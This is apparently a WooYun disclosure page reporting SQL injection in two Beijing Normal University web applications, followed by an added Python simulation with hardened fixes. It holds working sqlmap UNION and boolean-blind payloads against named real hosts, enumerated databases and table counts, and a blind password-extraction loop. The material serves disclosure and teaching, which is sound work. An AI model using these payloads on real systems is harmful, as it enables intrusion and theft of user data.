WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles, online browsing -------- http://drop.zone.ci/
2015-11-24: Details have been sent to the vendor and are awaiting vendor handling
2015-11-29: The vendor has proactively ignored the vulnerability; details are disclosed to the public
As the title says.
GET /contest/show_ce_info.php?runid= HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://acm.bnu.edu.cn
Cookie: bnuoj_v3_style=journal; cstandset_null_7274=shownum%3D0%26autoref%3Don%26anim%3Don%26cid%3D7274; defaultshare=1; mjx.menu=; bnuoj_v3_defaultshare=1
Host: acm.bnu.edu.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

The runid parameter is injectable.
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: runid (GET)
    Type: UNION query
    Title: Generic UNION query (random number) - 1 column
    Payload: runid=-8371 UNION ALL SELECT CONCAT(0x716b767071,0x6d78735241484c55596967754b6f58706a6175774868664644707a776e6454444672414d65636269,0x716a6a7671)-- -
---
web application technology: PHP 5.6.7
back-end DBMS: active fingerprint: MySQL >= 5.5.0
               banner parsing fingerprint: MySQL 5.5.36, logging enabled
banner: '5.5.36-MariaDB-1~squeeze-log'
available databases [4]:
[*] bnuoj
[*] bnuojoi
[*] graduate
[*] information_schema

Database: graduate
+----------+---------+
| Table    | Entries |
+----------+---------+
| `user`   | 51      |
| ranklist | 51      |
| problem  | 9       |
| status   | 1       |
+----------+---------+

Database: bnuojoi
+----------+---------+
| Table    | Entries |
+----------+---------+
| status   | 5800    |
| `user`   | 334     |
| ranklist | 334     |
| problem  | 138     |
| mail     | 23      |
+----------+---------+
GET /achievements.jsp?fenye=*&www=1 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://ireg.bnu.edu.cn
Cookie: JSESSIONID=A958431F27BD1F7AF4A00031374E1722; imgnum=0
Host: ireg.bnu.edu.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

The fenye parameter is injectable.

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: MySQL >= 5.0 boolean-based blind - Parameter replace
    Payload: http://ireg.bnu.edu.cn:80/achievements.jsp?fenye=(SELECT (CASE WHEN (7284=7284) THEN 7284 ELSE 7284*(SELECT 7284 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&www=1
---
web application technology: JSP
back-end DBMS: MySQL 5
available databases [5]:
[*] bierf
[*] bierfcist
[*] iiki2013reg
[*] information_schema
[*] test
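The two sqlmap findings above are different injection techniques against the same root cause: a numeric request parameter pasted into SQL text. The following is an added example written for this page, not code from the report or from the BNU applications, that simulates both endpoints against a constructed SQLite database. Table and column names (status.ce_info, user.password), the assumption that fenye (分页, "pagination") is a page number used in OFFSET, and the sample rows are all hypothetical. The UNION payload keeps the shape of the one on the page (negative id, UNION ALL, one column, trailing "-- -") but uses SQLite's || instead of MySQL's CONCAT() and 0x.. literals. The blind oracle differs in one detail: sqlmap's CASE WHEN payload relies on MySQL raising "Subquery returns more than 1 row" in the false branch, which SQLite does not do, so here the false branch evaluates to a page offset that returns no rows. The hardened handlers show the fix: cast to int and bind the value.

```python
import sqlite3

# Constructed sample data; the real schemas behind the two endpoints are not on the page.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE status (runid INTEGER, ce_info TEXT);
        CREATE TABLE user (username TEXT, password TEXT);
        INSERT INTO status VALUES (1, 'error: expected semicolon');
        INSERT INTO user VALUES ('admin', 'S3cret');
    """)
    return conn

# --- Finding 1: show_ce_info.php?runid=  (UNION query, 1 column) ----------------

def show_ce_info_vulnerable(conn, runid):
    """Hypothetical vulnerable handler: the parameter is pasted into the SQL text."""
    sql = "SELECT ce_info FROM status WHERE runid=" + runid
    return [row[0] for row in conn.execute(sql)]

def show_ce_info_fixed(conn, runid):
    """Hardened form: integer cast plus a bound parameter, so the value can
    never become SQL syntax."""
    runid_int = int(runid)  # ValueError for "-8371 UNION ALL SELECT ..."
    rows = conn.execute("SELECT ce_info FROM status WHERE runid=?", (runid_int,))
    return [row[0] for row in rows]

# Same shape as the sqlmap payload on the page; CONCAT()/0x.. are MySQL-only,
# so SQLite's || operator stands in for them.
UNION_PAYLOAD = "-8371 UNION ALL SELECT username||':'||password FROM user-- -"

# --- Finding 2: achievements.jsp?fenye=  (boolean-based blind, parameter replace) --

PAGE_SIZE = 1  # assumed page size for the simulated pagination

def achievements_vulnerable(conn, fenye):
    """Hypothetical handler: fenye (assumed to be a page number) lands in OFFSET."""
    sql = "SELECT username FROM user LIMIT %d OFFSET (%s)*%d" % (PAGE_SIZE, fenye, PAGE_SIZE)
    return [row[0] for row in conn.execute(sql)]

def achievements_fixed(conn, fenye):
    """Hardened form: int cast, then LIMIT/OFFSET supplied as bound parameters."""
    rows = conn.execute("SELECT username FROM user LIMIT ? OFFSET ?",
                        (PAGE_SIZE, int(fenye) * PAGE_SIZE))
    return [row[0] for row in rows]

def blind_extract_password(conn, max_len=16):
    """Parameter-replace inference: the injected expression evaluates to page 0
    (rows come back) when the character guess is right and to page 99 (empty)
    when it is wrong, the same true/false oracle sqlmap builds with CASE WHEN."""
    charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
    found = ""
    for pos in range(1, max_len + 1):
        for ch in charset:
            cond = "substr((SELECT password FROM user LIMIT 1),%d,1)='%s'" % (pos, ch)
            payload = "(SELECT CASE WHEN %s THEN 0 ELSE 99 END)" % cond
            if achievements_vulnerable(conn, payload):
                found += ch
                break
        else:
            break  # no character matched at this position: end of the string
    return found

def rejects(handler, conn, value):
    """True if the hardened handler refuses the value outright (ValueError)."""
    try:
        handler(conn, value)
    except ValueError:
        return True
    return False

if __name__ == "__main__":
    db = make_db()
    print(show_ce_info_vulnerable(db, UNION_PAYLOAD))   # leaks admin:S3cret
    print(rejects(show_ce_info_fixed, db, UNION_PAYLOAD))
    print(blind_extract_password(db))                    # S3cret, one char per probe loop
```

The blind loop makes one request per candidate character per position, which is why sqlmap's boolean-based technique is slow but needs nothing more than a page that renders differently for true and false. Both hardened handlers reject the payloads before any SQL runs; binding alone would also be enough, but the int cast gives a clear failure for the two parameters here, which are numeric by design.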
Severity: no impact, vendor ignored
Ignored at: 2015-11-29 12:28
Vulnerability Rank: 4 (WooYun rating)
None yet